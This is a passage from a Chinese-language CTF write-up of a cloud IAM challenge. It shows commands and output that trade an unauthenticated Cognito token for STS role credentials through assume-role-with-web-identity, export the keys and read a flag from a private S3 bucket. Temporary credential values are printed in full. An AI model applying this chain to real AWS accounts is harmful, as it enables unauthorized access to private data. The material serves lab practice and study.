"Token": "eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVjYi1jMjQ5LWZhZDgtYTY2MTc2ZjY0YmU0IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDU3NTk0NjAsImlhdCI6MTc0NTc1ODg2MH0.GgPIR6lvxMwDZGwkq7e6WdSSZF_iX0IKnNFJcxCUCGUfSMRTnCQQGW2WVujUbge6oM_EJqQCzW80ZRHplkzLm8oicPBnyMvWD9rFSVK3K6oe98YWOCEkpTwdVq6k3VwUFq8jhFwA-Paralhcs2YAxhExI1H0fSOyetSfAgcid9w98ORlsVi5UF5Y9e438ktABb28OPVios4uxzl3gZmGI4PAeGs_WLn6yLhlIDqLiO9CTT8obrjzXI7MkOGXyYB9li095VQE_SYVVqgp7OqbvFNmoxIKaBdi_tFmpDQoF6aqplYzjb4lhcW16g0rRW9Fh1utwS31AJjcuozQZYaW7A"
}
有了TOKEN我们就可以调用 assume-role-with-web-identity 生成一个 STS
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name c1trus --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWVjYi1jMjQ5LWZhZDgtYTY2MTc2ZjY0YmU0IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDU3NTk0NjAsImlhdCI6MTc0NTc1ODg2MH0.GgPIR6lvxMwDZGwkq7e6WdSSZF_iX0IKnNFJcxCUCGUfSMRTnCQQGW2WVujUbge6oM_EJqQCzW80ZRHplkzLm8oicPBnyMvWD9rFSVK3K6oe98YWOCEkpTwdVq6k3VwUFq8jhFwA-Paralhcs2YAxhExI1H0fSOyetSfAgcid9w98ORlsVi5UF5Y9e438ktABb28OPVios4uxzl3gZmGI4PAeGs_WLn6yLhlIDqLiO9CTT8obrjzXI7MkOGXyYB9li095VQE_SYVVqgp7OqbvFNmoxIKaBdi_tFmpDQoF6aqplYzjb4lhcW16g0rRW9Fh1utwS31AJjcuozQZYaW7A
{
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXOCRBAHV7",
"SecretAccessKey": "uJNHJIFIXl4CVGtCFfwMtJpsL1/33qZtUWBb8XE4",
"SessionToken": "IQoJb3JpZ2luX2VjEMX//////////wEaCXVzLWVhc3QtMSJHMEUCIB6W+l/b0YpH9DmvNjaaj9We5OpK2q+9HqgYgQWVzmYzAiEAj4Cfss0/fJ5vmJcuquqajgWGeEQ8Nfno6tvrUpTjP8IqhwMIXhAAGgwwOTIyOTc4NTEzNzQiDFWhoZpRzrJjDTlQOSrkArYN/a4Okh49tv3wVfifpSifH+g/FjN8OyuhGhqxxib8K/TQ5oHH6tc2xRHgL1mfS9a46DZoNRoNxgTcnOqTJiKUtEsvYkGZ8VKsrVOkwtkkdq7Xowv72DjZGY32ebuZhXbAsinjWciVqfQV2S/J34nSlfKdft9zoOMD+BPWKDgHikWD4et5vqjXH4Hac1NvymH6Y2XWgZqOesvdKAdE6dvB+gvJi5LL0CLhHnAP2j3IDeC4nzQ6LuCW6W6ApSFMcvA3O9qYhKRws3tDg2GaUIKRleNab8x/zNfxVr0qtMLNAlf2dqHYMyv+PUhtzdthYVSjEhhIeUqLnH7pBMHDanZbccH2ho2EOQV94OexDSsuOdfrzBWkxq7B598hxyosvK5UYRMlD9cZIijb2XxOTTazLC6HAccwRNpB3a1YJI1hn3Mz6KGiZVS4ai0kA03GCsL+S2EQZlqyF8KKJ78PZIUmhVkfMPfVuMAGOocC+/GR2bs6bvMph+9GUMJiQ6Is2q6UYZP3VAvM86Uafk8U74yWA5lQJMuQuES6E/W9MTOi9xVkF0s2ZD+qIFNRh4FnwPamhTD9u/LTF03Erq1bWn4XW06VfCs5FGRZf8Dea1DqwKzpW1AbzqDysJK1ydIi2qQQ1FpDaEfMpgrl5WV/TTZ3Qvsy9E+KVldeMlmX+rWleCW0sm+oQYQ3S49spo/Vf3qaxp9W/f3q6v/MDZvrOwW7h8iOQ49idIXIWUJBJR8eAjRPye5CVHb+MmF8u+2t661/I5I39t40AGbdQpaVIaIix4UBBTCqGhACUDXj5m1EzicCxM1gXBhkbYW1fodPGN00iDw=",
"Expiration": "2025-04-27T14:02:47+00:00"
},
"SubjectFromWebIdentityToken": "us-east-1:157d6171-eecb-c249-fad8-a66176f64be4",
"AssumedRoleUser": {
"AssumedRoleId": "AROARK7LBOHXASFTNOIZG:c1trus",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/c1trus"
},
"Provider": "cognito-identity.amazonaws.com",
"Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
导入环境变量
export AWS_ACCESS_KEY_ID=ASIARK7LBOHXOCRBAHV7
export AWS_SECRET_ACCESS_KEY=uJNHJIFIXl4CVGtCFfwMtJpsL1/33qZtUWBb8XE4
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEMX//////////wEaCXVzLWVhc3QtMSJHMEUCIB6W+l/b0YpH9DmvNjaaj9We5OpK2q+9HqgYgQWVzmYzAiEAj4Cfss0/fJ5vmJcuquqajgWGeEQ8Nfno6tvrUpTjP8IqhwMIXhAAGgwwOTIyOTc4NTEzNzQiDFWhoZpRzrJjDTlQOSrkArYN/a4Okh49tv3wVfifpSifH+g/FjN8OyuhGhqxxib8K/TQ5oHH6tc2xRHgL1mfS9a46DZoNRoNxgTcnOqTJiKUtEsvYkGZ8VKsrVOkwtkkdq7Xowv72DjZGY32ebuZhXbAsinjWciVqfQV2S/J34nSlfKdft9zoOMD+BPWKDgHikWD4et5vqjXH4Hac1NvymH6Y2XWgZqOesvdKAdE6dvB+gvJi5LL0CLhHnAP2j3IDeC4nzQ6LuCW6W6ApSFMcvA3O9qYhKRws3tDg2GaUIKRleNab8x/zNfxVr0qtMLNAlf2dqHYMyv+PUhtzdthYVSjEhhIeUqLnH7pBMHDanZbccH2ho2EOQV94OexDSsuOdfrzBWkxq7B598hxyosvK5UYRMlD9cZIijb2XxOTTazLC6HAccwRNpB3a1YJI1hn3Mz6KGiZVS4ai0kA03GCsL+S2EQZlqyF8KKJ78PZIUmhVkfMPfVuMAGOocC+/GR2bs6bvMph+9GUMJiQ6Is2q6UYZP3VAvM86Uafk8U74yWA5lQJMuQuES6E/W9MTOi9xVkF0s2ZD+qIFNRh4FnwPamhTD9u/LTF03Erq1bWn4XW06VfCs5FGRZf8Dea1DqwKzpW1AbzqDysJK1ydIi2qQQ1FpDaEfMpgrl5WV/TTZ3Qvsy9E+KVldeMlmX+rWleCW0sm+oQYQ3S49spo/Vf3qaxp9W/f3q6v/MDZvrOwW7h8iOQ49idIXIWUJBJR8eAjRPye5CVHb+MmF8u+2t661/I5I39t40AGbdQpaVIaIix4UBBTCqGhACUDXj5m1EzicCxM1gXBhkbYW1fodPGN00iDw=
在 wiz-privatefiles-x1000 存储桶下找到 FLAG 文件
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws s3 ls
2024-06-06 02:21:35 challenge-website-storage-1fa5073
2024-06-06 04:25:59 payments-system-cd6e4ba
2023-06-04 13:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 09:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-04 12:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 09:28:31 wiz-privatefiles
2023-06-05 09:28:31 wiz-privatefiles-x1000
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# aws s3api get-object --bucket wiz-privatefiles-x1000 --key flag2.txt flag2.txt
{
"AcceptRanges": "bytes",
"LastModified": "2023-06-05T13:28:35+00:00",
"ContentLength": 40,
"ETag": "\"48b4d561fb4900a861fa55626be4a103\"",
"ContentType": "text/plain",
"ServerSideEncryption": "AES256",
"Metadata": {}
}
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# ls
challenge2 flag2.txt
┌──(root㉿kali)-[~/Desktop/cloud_ctf/bigIAM/2]
└─# cat flag2.txt
{wiz:open-sesame-or-shell-i-say-openid}
